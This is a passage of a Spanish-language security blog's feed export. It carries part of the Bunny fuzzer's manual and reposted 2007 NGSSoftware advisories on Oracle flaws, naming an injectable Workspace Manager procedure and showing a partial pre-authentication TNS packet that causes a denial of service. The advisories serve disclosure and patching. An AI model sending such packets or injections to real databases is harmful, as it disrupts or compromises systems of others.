multiple similar crash cases, but&lt;br /&gt;                  slightly improves coverage.&lt;br /&gt;&lt;br /&gt;    -g          - use audible notification (aka "beep") to alert of crashes.&lt;br /&gt;                  The exact behavior of this depends on your terminal settings.&lt;br /&gt;&lt;br /&gt;  Fuzzing process control (these options affect performance):&lt;br /&gt;&lt;br /&gt;    -B nn[+s]   - controls bit flip fuzzing stage (1/8); limits flip run length&lt;br /&gt;                  to '&lt;/span&gt;&lt;span class="pln"&gt;nn&lt;/span&gt;&lt;span class="str"&gt;' bits, and uses a stepover of '&lt;/span&gt;&lt;span class="pln"&gt;s&lt;/span&gt;&lt;span class="str"&gt;'.&lt;br /&gt;&lt;br /&gt;    -C nn[+s]   - controls chunk operations; limits chunk size to '&lt;/span&gt;&lt;span class="pln"&gt;nn&lt;/span&gt;&lt;span class="str"&gt;' bytes,&lt;br /&gt;                  uses a stepover of '&lt;/span&gt;&lt;span class="pln"&gt;s&lt;/span&gt;&lt;span class="str"&gt;'.&lt;br /&gt;&lt;br /&gt;                  Note that chunk operations are time-consuming; keep this and&lt;br /&gt;                  -O options in check for larger files.&lt;br /&gt;&lt;br /&gt;    -O nn       - controls chunk operations; limits chunk displacement to '&lt;/span&gt;&lt;span class="pln"&gt;nn&lt;/span&gt;&lt;span class="str"&gt;'&lt;br /&gt;                  bytes.&lt;br /&gt;&lt;br /&gt;    -E nn       - controls effector registration; limits the number of&lt;br /&gt;                  effectors associated with a single trace value. Prevents&lt;br /&gt;                  checksums and similar fields from diluting the effector set.&lt;br /&gt;&lt;br /&gt;    -X b:nn     - affects value walk stage (2/8); Bunny uses a set of&lt;br /&gt;                  predefined "interesting" values, such as -1, 0, or MAX_INT,&lt;br /&gt;                  in order to trigger fault conditions (see config.h). You can&lt;br /&gt;                  override this set by specifying multiple -X parameters. First&lt;br /&gt;                  field, '&lt;/span&gt;&lt;span class="pln"&gt;b&lt;/span&gt;&lt;span class="str"&gt;', specified byte width (1, 2, or 4), second field&lt;br /&gt;                  is a signed integer to use.&lt;br /&gt;&lt;br /&gt;    -Y nn       - controls random walk stage (3/8); sets the number of random&lt;br /&gt;                  values to try before moving on.&lt;br /&gt;&lt;br /&gt;    -R nn       - controls random exploration stages; resets fuzzed file to&lt;br /&gt;                  its pristine state every '&lt;/span&gt;&lt;span class="pln"&gt;nn&lt;/span&gt;&lt;span class="str"&gt;' tries, stacks random&lt;br /&gt;                  modifications in between.&lt;br /&gt;&lt;br /&gt;    -S nn       - controls random exploration stages; sets the number of random&lt;br /&gt;                  operations stacked in every round.&lt;br /&gt;&lt;br /&gt;    -N nn       - controls queue branching; caps the number of call paths&lt;br /&gt;                  registered in a single fuzzing round.&lt;br /&gt;&lt;br /&gt;    -P nn       - controls queue branching; likewise, but for parameter&lt;br /&gt;                  variations.&lt;br /&gt;&lt;br /&gt;    -L nn       - controls per-round calibration cycle count; these cycles&lt;br /&gt;                  are used to establish execution baseline, detect variable&lt;br /&gt;                  parameters such as time(0) or getpid() output, and the like.&lt;br /&gt;                  Use -L 1 to speed things up if you have no reason to suspect&lt;br /&gt;                  these are used by a program, or higher values to detect&lt;br /&gt;                  really sneaky cases.&lt;br /&gt;&lt;br /&gt;    -M nn       - controls trace depth; limits the number of instrumented&lt;br /&gt;                  function calls analyzed in each run. This is the primary&lt;br /&gt;                  method of managing tracing performance, memory usage, and&lt;br /&gt;                  trace time.&lt;br /&gt;&lt;br /&gt;    -F nn       - controls block operations; caps fuzzable data set size to&lt;br /&gt;                  prevent runaway size increments in some rare cases. By&lt;br /&gt;                  default set to initial set size, times 2.&lt;br /&gt;&lt;br /&gt;    -8          - controls value set stage; enables the use of all possible&lt;br /&gt;                  8-bit values, instead of the default subset of "interesting"&lt;br /&gt;                  ones. Recommended, time permitting.&lt;br /&gt;&lt;br /&gt;    -r          - controls parameter variation detection; enables finer-grained&lt;br /&gt;                  value ranging to detect more subtle differences (will result&lt;br /&gt;                  in far more variable paths being discovered).&lt;br /&gt;&lt;br /&gt;    -z          - disables parameter variation detection; parameter path forks&lt;br /&gt;                  will not be recorded. This is a very coarse but quick method.&lt;br /&gt;&lt;br /&gt;    -k          - disables deterministic fuzzing rounds, and goes straight to&lt;br /&gt;                  random stacking. This is a particularly useful for easy&lt;br /&gt;                  parallelization.&lt;br /&gt;&lt;br /&gt;    -q          - randomizes queue processing; this might speed up discovery&lt;br /&gt;                  of deeper-nested problems, though there is no guarantee&lt;br /&gt;                  whatsoever.&lt;/span&gt;&lt;/pre&gt;&lt;h2&gt;Advanced usage notes&lt;/h2&gt;&lt;p&gt;This section contains assorted tips for optimizing fuzzing performance and dealing with complex input scenarios &lt;/p&gt;&lt;h3&gt;Minimizing fuzzing effort&lt;/h3&gt;&lt;p&gt;For certain applications, it might be quite obviously highly advisable to make generic tweaks to the code in order to improve odds of fuzzing, such as the removal of CRC32 checks, or flipping the switch on null encryption schemes. &lt;/p&gt;&lt;h3&gt;Selective instrumentation tools&lt;/h3&gt;&lt;p&gt;&lt;tt&gt;bunny-gcc&lt;/tt&gt; will automatically instrument function names, parameters, nesting level, and return values. This is optimal for almost all projects, large and small - but when dealing with ultra-compact code, or targeting the inner workings of a single suspect function, you can install hooks manually, by adding a &lt;tt&gt;BunnySnoop&lt;/tt&gt; preprocessor directive with an integer parameter inline in the function: &lt;/p&gt;&lt;pre class="prettyprint"&gt;&lt;span class="pln"&gt;    &lt;/span&gt;&lt;span class="typ"&gt;BunnySnoop&lt;/span&gt;&lt;span class="pln"&gt; table&lt;/span&gt;&lt;span class="pun"&gt;[&lt;/span&gt;&lt;span class="lit"&gt;0&lt;/span&gt;&lt;span class="pun"&gt;];&lt;/span&gt;&lt;/pre&gt;&lt;p&gt;WARNING: Make sure that, no matter which call path within a function is taken, a constant number of &lt;tt&gt;BunnySnoop&lt;/tt&gt; statements will be encountered. A mismatch will cause a runtime error, because the fuzzer can't immediately figure out how to compare such variations in a meaningful manner. &lt;/p&gt;&lt;p&gt;In some cases, it is undesirable to instrument a particular function - for example, if it is invoked in a read loop to perform a fairly mundane task, and produces megabytes of useless trace information; to manually suppress instrumentation, use &lt;tt&gt;BunnySkip&lt;/tt&gt; directive immediately before a &lt;tt&gt;{ ... }&lt;/tt&gt; block, for example: &lt;/p&gt;&lt;pre class="prettyprint"&gt;&lt;span class="pln"&gt;    &lt;/span&gt;&lt;span class="kwd"&gt;static&lt;/span&gt;&lt;span class="pln"&gt; &lt;/span&gt;&lt;span class="kwd"&gt;int&lt;/span&gt;&lt;span class="pln"&gt; do_boring_stuff&lt;/span&gt;&lt;span class="pun"&gt;(&lt;/span&gt;&lt;span class="kwd"&gt;char&lt;/span&gt;&lt;span class="pun"&gt;*&lt;/span&gt;&lt;span class="pln"&gt; buf&lt;/span&gt;&lt;span class="pun"&gt;)&lt;/span&gt;&lt;span class="pln"&gt; &lt;/span&gt;&lt;span class="typ"&gt;BunnySkip&lt;/span&gt;&lt;span class="pln"&gt; &lt;/span&gt;&lt;span class="pun"&gt;{&lt;/span&gt;&lt;span class="pln"&gt;&lt;br /&gt;      &lt;/span&gt;&lt;span class="pun"&gt;...&lt;/span&gt;&lt;span class="pln"&gt;&lt;br /&gt;    &lt;/span&gt;&lt;span class="pun"&gt;}&lt;/span&gt;&lt;/pre&gt;&lt;h3&gt;Advanced output structure management&lt;/h3&gt;&lt;p&gt;Bunny supports selective fuzzing of files and multi-packet network output: &lt;/p&gt;&lt;ol&gt;&lt;li&gt;Each file placed in there is output in a separate write; if you wish to send multiple packets, this is a method to achieve this. Files in this directory will be sorted and used in a default alphasort order. e.g.: &lt;tt&gt;packet0001, packet0002, packet0003 ...&lt;/tt&gt; &lt;/li&gt;&lt;/ol&gt;&lt;ol&gt;&lt;li&gt;File names ending with &lt;tt&gt;.keep&lt;/tt&gt; will &lt;strong&gt;not&lt;/strong&gt; be fuzzed, but passed through as-is. This is useful for excluding chunks of a large input set from the tests for performance reasons. &lt;/li&gt;&lt;/ol&gt;&lt;ol&gt;&lt;li&gt;If a 0-sized &lt;tt&gt;*.keep&lt;/tt&gt; file is encountered, and the output is to a network socket, the output component will pause to sink an input packet received from the remote party before continuing. This can be used to fuzz interactive client-server communications (e.g., wait for a response before sending a new command). &lt;/li&gt;&lt;/ol&gt;&lt;p&gt;The number of "fuzzable" bytes has a linear impact on the speed of testing, simply because most of the fuzzing steps involve deterministic, sequential changes to the data. File sizes between 1 and 250 bytes are probably optimal, assuming default settings. &lt;/p&gt;&lt;h2&gt;Troubleshooting&lt;/h2&gt;&lt;p&gt;This section describes common real-world fuzzing problems, and suggestions on how to deal with them. &lt;/p&gt;&lt;p&gt;&lt;strong&gt;Problem:&lt;/strong&gt; I cannot build the fuzzer itself because of some &lt;tt&gt;-Wno-pointer-sign&lt;/tt&gt; error. &lt;/p&gt;&lt;p&gt;&lt;strong&gt;Suggestion:&lt;/strong&gt; Use a newer version of GCC or remove the first occurrence of &lt;tt&gt;-Wno-pointer-sign&lt;/tt&gt; in project's &lt;tt&gt;Makefile&lt;/tt&gt;. &lt;/p&gt;&lt;p&gt;&lt;strong&gt;Problem:&lt;/strong&gt; When I try to issue &lt;tt&gt;make&lt;/tt&gt; on a program to be instrumented, I get libtool lock errors and the compilation hangs. &lt;/p&gt;&lt;p&gt;&lt;strong&gt;Suggestion:&lt;/strong&gt; This is because of an ill-conceived check in some autoconf files. This check inevitably breaks with some compilers. Re-run ./configure but append &lt;tt&gt;--disable-libtool-lock&lt;/tt&gt; to its command-line options, then try &lt;tt&gt;make&lt;/tt&gt; again. &lt;/p&gt;&lt;p&gt;&lt;strong&gt;Problem:&lt;/strong&gt; Bunny completes a couple of fuzzing rounds and gives up. &lt;/p&gt;&lt;p&gt;&lt;strong&gt;Suggestion:&lt;/strong&gt; The utility can't find enough interesting call paths to follow. Try the following: &lt;/p&gt;&lt;ul&gt;&lt;li&gt;If you are fuzzing a library, make sure not only the test program, but also the library itself is properly instrumented, and that your test program indeed uses the instrumented copy, not a system-wide version. Use &lt;tt&gt;LD_LIBRARY_PATH&lt;/tt&gt; to guide the dynamic linker. &lt;/li&gt;&lt;li&gt;Make sure that the targeted code does not reside in a single, compact function - if so, you have to instrument the function manually using &lt;tt&gt;BunnySnoop&lt;/tt&gt; directive (see above). &lt;/li&gt;&lt;li&gt;Make sure that the initial input file makes sense to the traced program and triggers the instrumented functionality. &lt;/li&gt;&lt;li&gt;If any mentions of skipped function calls appear in the output of the fuzzer, Crank up the depth of instrumentation (&lt;tt&gt;-P&lt;/tt&gt; parameter) to a higher value. &lt;/li&gt;&lt;li&gt;Crank up the intensity of fuzzing to get to other code locations: specify &lt;tt&gt;-8&lt;/tt&gt;, increase limits for &lt;tt&gt;-R&lt;/tt&gt;, &lt;tt&gt;-S&lt;/tt&gt;, &lt;tt&gt;-B&lt;/tt&gt;, &lt;tt&gt;-C&lt;/tt&gt;, and &lt;tt&gt;-O&lt;/tt&gt; options. &lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;strong&gt;Problem:&lt;/strong&gt; Bunny keeps finding tons of new call paths and there is no end in sight. &lt;/p&gt;&lt;p&gt;&lt;strong&gt;Suggestion:&lt;/strong&gt; Too much branching is undesirable, as it might compromise the coverage of performed tests. Try the following: &lt;/p&gt;&lt;ul&gt;&lt;li&gt;Adjust &lt;tt&gt;-M&lt;/tt&gt; parameter to reduce the depth of instrumentation, &lt;/li&gt;&lt;li&gt;Ensure uniform testing space: use &lt;tt&gt;-q&lt;/tt&gt; option to randomize queue processing, &lt;tt&gt;-k&lt;/tt&gt; to skip sequential fuzzing rounds, &lt;/li&gt;&lt;li&gt;Run the application under bunny-trace and see if there are any recursive calls that do not serve an important function. If so, use &lt;tt&gt;BunnySkip&lt;/tt&gt; to selectively disable instrumentation. &lt;/li&gt;&lt;li&gt;If most of these are parameter-related variations, decrease &lt;tt&gt;-P&lt;/tt&gt; to a very small value to rate-limit this aspect of exec path exploration, or &lt;tt&gt;-z&lt;/tt&gt; to inhibit it altogether. &lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;strong&gt;Problem:&lt;/strong&gt; Fuzzing is very slow, and I'm getting bogus "timeout" crash reports. &lt;/p&gt;&lt;p&gt;&lt;strong&gt;Suggestion:&lt;/strong&gt; The traced application is painfully slow. Try the following: &lt;/p&gt;&lt;ul&gt;&lt;li&gt;Adjust &lt;tt&gt;-s&lt;/tt&gt; and &lt;tt&gt;-x&lt;/tt&gt; options to raise time quotas allotted to each run, &lt;/li&gt;&lt;li&gt;Reduce input file size (for example, use a 2x2 JPEG with no EXIF data or comments, instead of a 100k photo), &lt;/li&gt;&lt;li&gt;Reduce &lt;tt&gt;-R&lt;/tt&gt;, &lt;tt&gt;-S&lt;/tt&gt;, &lt;tt&gt;-B&lt;/tt&gt;, &lt;tt&gt;-C&lt;/tt&gt;, and &lt;tt&gt;-O&lt;/tt&gt; option values to speed up fuzzing, cosider using &lt;tt&gt;-k&lt;/tt&gt; to disable most fuzzing rounds altogether, &lt;/li&gt;&lt;li&gt;Move the process to a faster machine. &lt;/li&gt;&lt;li&gt;Investigate how to speed up the traced application - enable optimization, prelink, add code to bail out on known DoS conditions, etc. &lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;strong&gt;Problem:&lt;/strong&gt; I want to trace a non-instrumented application. &lt;/p&gt;&lt;p&gt;&lt;strong&gt;Suggestion:&lt;/strong&gt; Use &lt;tt&gt;-d&lt;/tt&gt; option, and be sure to crank up &lt;tt&gt;-R&lt;/tt&gt;, &lt;tt&gt;-S&lt;/tt&gt;, &lt;tt&gt;-B&lt;/tt&gt;, and &lt;tt&gt;-C&lt;/tt&gt; limits, possibly use &lt;tt&gt;-8&lt;/tt&gt; option - in this mode, Bunny will execute a single round of testing only, so get the best of it. &lt;/p&gt;&lt;h2&gt;Limitations &amp;amp; known issues&lt;/h2&gt;&lt;p&gt;The approach implemented by Bunny will be ineffective against protocols that implement very strong checksums or other constraints that are nearly impossible to brute-force - although unlike traditional fuzzing, it should be reasonably effective against weak checksums. &lt;/p&gt;&lt;p&gt;When operating on auto-instrumented C-function level, it is unlikely for this or any other protocol-blind fuzzer to discover new non-trivial syntax (such as an undocumented HTML tag or a complex protocol message) if it is not a part of the input file and cannot be gradually derived from it, unless you instrument functions such as strcmp(); but then again, bunny should be remarkably more effective once such a syntax is accidentally stumbled upon. &lt;/p&gt;&lt;p&gt;Known issues with the current code: &lt;/p&gt;&lt;ul&gt;&lt;li&gt;Multiple threads and processes are supported, and input will be collected from all threads and properly separated - but the trace continues only as long as the initial process is running, and only the initial process will be surveyed for &lt;tt&gt;SEGV&lt;/tt&gt; and similar fault conditions. There is no easy way to intercept child process signals on Linux without resorting to dirty &lt;tt&gt;ptrace()&lt;/tt&gt; tricks or signal handler injection. &lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;The only platforms known to work fine are Linux, flavors of BSD, and Cygwin on IA32 platforms. Support for 64-bit and other unix systems is not confirmed. There is no support for non-x86 architectures, although this requires very few tweaks to correct. &lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;The C parser and its hooks is not necessarily compatible with restricted dialects of C that do not implement C99 + GNU extensions. This is because the instrumentation code uses &lt;tt&gt;__attribute__&lt;/tt&gt; features to gain unobtrusive access to library functions and suppress certain warnings. &lt;tt&gt;bunny-gcc&lt;/tt&gt; will strip any flags that restrict the dialect of an input file, and this might have an adverse effect in some rare circumstances. &lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;&lt;tt&gt;bunny-exec&lt;/tt&gt; registers call paths in the order of appearance, and can't recover cleanly from a situation where this changes randomly because of scheduler decisions when multiple threads are spawned (nearly) at once. I see no easy way to solve this, and it might be not worth the effort. &lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;On calls to &lt;tt&gt;longjmp&lt;/tt&gt; or with newly spawned threads, the nesting level reported by &lt;tt&gt;bunny-trace&lt;/tt&gt; might be off. This does not affect the tracing process. &lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;&lt;tt&gt;varargs&lt;/tt&gt; are not supported, which limits the amount of data collected about some relatively rare internal functions (again, the overhead needed for handling this is considerable, and there seem to be no cases that would warrant it). &lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;Every unique call path encountered (but &lt;strong&gt;not&lt;/strong&gt; every unique parameter sequence) uses up several kilobytes of memory and is kept indefinitely in process address space. The record contains important calibration and effector data needed to properly handle revisits to that call path with new parameters, and cannot be simply deallocated. This is typically not a problem for short-run fuzzing, but when we enter the domain of billions of exec cycles, we might eventually hit the 2 GB limit. Storing older data on disk might be advisable. &lt;/li&gt;&lt;/ul&gt;  &lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-5983908544591046937?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/5983908544591046937/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=5983908544591046937' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/5983908544591046937'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/5983908544591046937'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2008/02/bunny-fuzzer.html' title='Bunny the Fuzzer'/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-9108364989794603867</id><published>2008-02-08T07:01:00.000-08:00</published><updated>2008-02-08T07:02:00.673-08:00</updated><title type='text'>Oracle Workspace Manager SQL Injection Flaw</title><content type='html'>tomado de: http://www.ngssoftware.com/advisories/high-risk-vulnerability-in-oracle-workspace-manager/&lt;br /&gt;&lt;br /&gt;&lt;div id="content"&gt;         &lt;div class="post"&gt;  &lt;h2&gt;&lt;a href="http://www.ngssoftware.com/advisories/high-risk-vulnerability-in-oracle-workspace-manager/"&gt;High Risk Vulnerability in Oracle Workspace Manager&lt;/a&gt;&lt;/h2&gt;  &lt;small&gt;October 17th, 2007&lt;br /&gt;&lt;/small&gt;&lt;br /&gt;      &lt;p&gt;NGSSoftware Insight Security Research Advisory&lt;/p&gt; &lt;p&gt;Name: SQL Injection Flaw in Oracle Workspace Manager&lt;br /&gt;Systems Affected: Oracle 10g release 1 and 2, Oracle 9i&lt;br /&gt;Severity: High&lt;br /&gt;Vendor URL: &lt;a target="_blank" href="http://www.oracle.com/"&gt;http://www.oracle.com/&lt;/a&gt;&lt;br /&gt;Author: David Litchfield [ &lt;a href="mailto:davidl@ngssoftware.com"&gt;davidl@ngssoftware.com&lt;/a&gt; ]&lt;br /&gt;Reported: 22nd August 2006&lt;br /&gt;Date of Public Advisory: 17th October 2007&lt;br /&gt;Advisory number: #NISR17102007B&lt;/p&gt; &lt;p&gt;Description&lt;br /&gt;***********&lt;br /&gt;The Workspace Manager in Oracle 10g release 1 and 2 and Oracle 9i is&lt;br /&gt;vulnerable to SQL injection.&lt;/p&gt; &lt;p&gt;Details&lt;br /&gt;*******&lt;/p&gt; &lt;p&gt;The Workspace Manager, owned by SYS, contains a package called LT. This&lt;br /&gt;package is owned and defined by the SYS user and can be executed by PUBLIC.&lt;br /&gt;LT contains a procedure called FINDRICSET which calls the FINDRICSET package&lt;br /&gt;in the LTRIC package. This is vulnerable to SQL injection and can be abused&lt;br /&gt;by an attacker to gain SYS privileges.&lt;/p&gt; &lt;p&gt;Fix Information&lt;br /&gt;***************&lt;br /&gt;Oracle was alerted to this flaw on the 22nd of August 2006. A patch has now&lt;br /&gt;been made available:&lt;/p&gt; &lt;p&gt;&lt;a target="_blank" href="http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2007.html"&gt;http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2007.html&lt;/a&gt;&lt;/p&gt; &lt;p&gt;NGSSQuirreL for Oracle, an advanced vulnerability assessment scanner&lt;br /&gt;designed specifically for Oracle, can be used to accurately determine&lt;br /&gt;whether your servers are vulnerable to this flaw. More information about&lt;br /&gt;NGSSQuirreL for Oracle can be found here:&lt;/p&gt; &lt;p&gt;&lt;a target="_blank" href="http://www.ngssoftware.com/products/database-security/ngs-squirrel-oracle.php"&gt;http://www.ngssoftware.com/products/database-security/ngs-squirrel-oracle.php&lt;/a&gt;&lt;/p&gt; &lt;p&gt;About NGSSoftware&lt;br /&gt;*****************&lt;br /&gt;NGSSoftware develops vulnerability assessment and compliancy tools for&lt;br /&gt;database servers including Oracle, Microsoft SQL Server, DB2, Sybase and&lt;br /&gt;Informix. Headquartered in the United Kingdom NGS has offices in London, St.&lt;br /&gt;Andrews (UK), Brisbane, and Perth (Australia) and Seattle in the United&lt;br /&gt;States; NGSConsulting provide services to some of the largest and most&lt;br /&gt;demanding organizations around the globe.&lt;br /&gt;&lt;a target="_blank" href="http://www.ngssoftware.com/"&gt;http://www.ngssoftware.com/&lt;/a&gt;&lt;br /&gt;Telephone +44 208 401 0070&lt;br /&gt;Fax +44 208 401 0076&lt;br /&gt;&lt;a href="mailto:enquiries@ngssoftware.com"&gt;enquiries@ngssoftware.com&lt;/a&gt; &lt;/p&gt;  &lt;/div&gt;         &lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-9108364989794603867?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/9108364989794603867/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=9108364989794603867' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/9108364989794603867'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/9108364989794603867'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2008/02/oracle-workspace-manager-sql-injection.html' title='Oracle Workspace Manager SQL Injection Flaw'/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-7075069007379895689</id><published>2008-02-08T06:59:00.000-08:00</published><updated>2008-02-08T07:01:04.608-08:00</updated><title type='text'>High Risk Vulnerability in Oracle RDBMS</title><content type='html'>Tomado de: http://www.ngssoftware.com/advisories/high-risk-vulnerability-in-oracle-rdbms/&lt;br /&gt;&lt;div id="content"&gt;         &lt;div class="post"&gt;  &lt;h2&gt;&lt;a href="http://www.ngssoftware.com/advisories/high-risk-vulnerability-in-oracle-rdbms/"&gt;High Risk Vulnerability in Oracle RDBMS&lt;/a&gt;&lt;/h2&gt;  &lt;small&gt;October 17th, 2007&lt;br /&gt;&lt;/small&gt;&lt;br /&gt;      &lt;p&gt;NGSSoftware Insight Security Research Advisory&lt;/p&gt; &lt;p&gt;Name: Oracle RDBMS Data packet DoS&lt;br /&gt;Systems Affected: Oracle 8.1.7.4, 10g Release 2 and 1, Oracle 9&lt;br /&gt;Severity: High&lt;br /&gt;Vendor URL: &lt;a target="_blank" href="http://www.oracle.com/"&gt;http://www.oracle.com/&lt;/a&gt;&lt;br /&gt;Author: David Litchfield [ &lt;a href="mailto:davidl@ngssoftware.com"&gt;davidl@ngssoftware.com&lt;/a&gt; ]&lt;br /&gt;Reported: 23rd June 2006&lt;br /&gt;Date of Public Advisory: 17th October 2007&lt;br /&gt;Advisory number: #NISR17102007D&lt;/p&gt; &lt;p&gt;Description&lt;br /&gt;***********&lt;br /&gt;The Oracle RDBMS on receiving an invalid TNS data packet will use 100% of&lt;br /&gt;the CPU’s time introducing a Denial of Service condition.&lt;/p&gt; &lt;p&gt;Details&lt;br /&gt;*******&lt;br /&gt;Once a client connects to the database process and performs protocol&lt;br /&gt;negoation (TNS packet type 1) and data type represenations (packet type 2)&lt;br /&gt;it may then  send packets of type 6 - Data packets. If the server gets a&lt;br /&gt;packet with the 2nd bit of the Data flags is set then the server runs at&lt;br /&gt;100% CPU:&lt;/p&gt; &lt;p&gt;“\x00\x1D” // Packet Size&lt;br /&gt;“\x00\x00″ // Packet Checksum&lt;br /&gt;“\x06″ // Packet Type [DATA]&lt;br /&gt;“\x00″ // Flags&lt;br /&gt;“\x00\x00″ // Header Checksum&lt;br /&gt;“\x00\x02″ // Data flags&lt;br /&gt;“\x03\x3B” // TTI Version function&lt;br /&gt;..&lt;br /&gt;..&lt;/p&gt; &lt;p&gt;The snippet of a packet above sets the Data flags to 0×0002 on a version&lt;br /&gt;request. This DoS condition can be triggered prior to authentication. This&lt;br /&gt;can be exploited by an unauthenticated attacker.&lt;/p&gt; &lt;p&gt;Fix Information&lt;br /&gt;***************&lt;br /&gt;Oracle was alerted to this flaw on the 23rd of June 2006. A patch has now&lt;br /&gt;been made available:&lt;/p&gt; &lt;p&gt;&lt;a target="_blank" href="http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2007.html"&gt;http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2007.html&lt;/a&gt;&lt;/p&gt; &lt;p&gt;NGSSQuirreL for Oracle, an advanced vulnerability assessment scanner&lt;br /&gt;designed specifically for Oracle, can be used to accurately determine&lt;br /&gt;whether your  servers is vulnerable to this flaw. More information about&lt;br /&gt;NGSSQuirreL for Oracle can be found here:&lt;/p&gt; &lt;p&gt;&lt;a target="_blank" href="http://www.ngssoftware.com/products/database-security/ngs-squirrel-oracle.php"&gt;http://www.ngssoftware.com/products/database-security/ngs-squirrel-oracle.php&lt;/a&gt;&lt;/p&gt; &lt;p&gt;About NGSSoftware&lt;br /&gt;*****************&lt;br /&gt;NGSSoftware develops vulnerability assessment and compliancy tools for&lt;br /&gt;database servers including Oracle, Microsoft SQL Server, DB2, Sybase and&lt;br /&gt;Informix.  Headquartered in the United Kingdom NGS has offices in London,&lt;br /&gt;St. Andrews (UK), Brisbane, and Perth (Australia) and seattle in the United&lt;br /&gt;States;  NGSConsulting provide services to some of the largest and most&lt;br /&gt;demanding organizations around the globe.&lt;br /&gt;&lt;a target="_blank" href="http://www.ngssoftware.com/"&gt;http://www.ngssoftware.com/&lt;/a&gt;&lt;br /&gt;Telephone +44 208 401 0070&lt;br /&gt;Fax +44 208 401 0076&lt;br /&gt;&lt;a href="mailto:enquiries@ngssoftware.com"&gt;enquiries@ngssoftware.com&lt;/a&gt; &lt;/p&gt;  &lt;/div&gt;         &lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-7075069007379895689?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/7075069007379895689/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=7075069007379895689' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/7075069007379895689'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/7075069007379895689'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2008/02/high-risk-vulnerability-in-oracle-rdbms.html' title='High Risk Vulnerability in Oracle RDBMS'/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-137432280110114517</id><published>2008-02-08T06:58:00.002-08:00</published><updated>2008-02-08T06:59:41.784-08:00</updated><title type='text'>High Risk Vulnerability in Oracle XMLDB FTP Service</title><content type='html'>tomado de:http://www.ngssoftware.com/advisories/high-risk-vulnerability-in-oracle-xmldb-ftp-service/&lt;br /&gt;&lt;div id="content"&gt;         &lt;div class="post"&gt;  &lt;h2&gt;&lt;a href="http://www.ngssoftware.com/advisories/high-risk-vulnerability-in-oracle-xmldb-ftp-service/"&gt;High Risk Vulnerability in Oracle XMLDB FTP Service&lt;/a&gt;&lt;/h2&gt;  &lt;small&gt;October 17th, 2007&lt;br /&gt;&lt;/small&gt;&lt;br /&gt;      &lt;p&gt;NGSSoftware Insight Security Research Advisory&lt;/p&gt; &lt;p&gt;Name: Oracle audit issue with XMLDB ftp service&lt;br /&gt;Systems Affected: Oracle Oracle 9ir2, 10g Release 1&lt;br /&gt;Severity: High&lt;br /&gt;Vendor URL: &lt;a target="_blank" href="http://www.oracle.com/"&gt;http://www.oracle.com/&lt;/a&gt;&lt;br /&gt;Author: David Litchfield [ &lt;a href="mailto:davidl@ngssoftware.com"&gt;davidl@ngssoftware.com&lt;/a&gt; ]&lt;br /&gt;Reported: 9th March 2006&lt;br /&gt;Date of Public Advisory: 17th October 2007&lt;br /&gt;Advisory number: #NISR17102007E&lt;/p&gt; &lt;p&gt;Description&lt;br 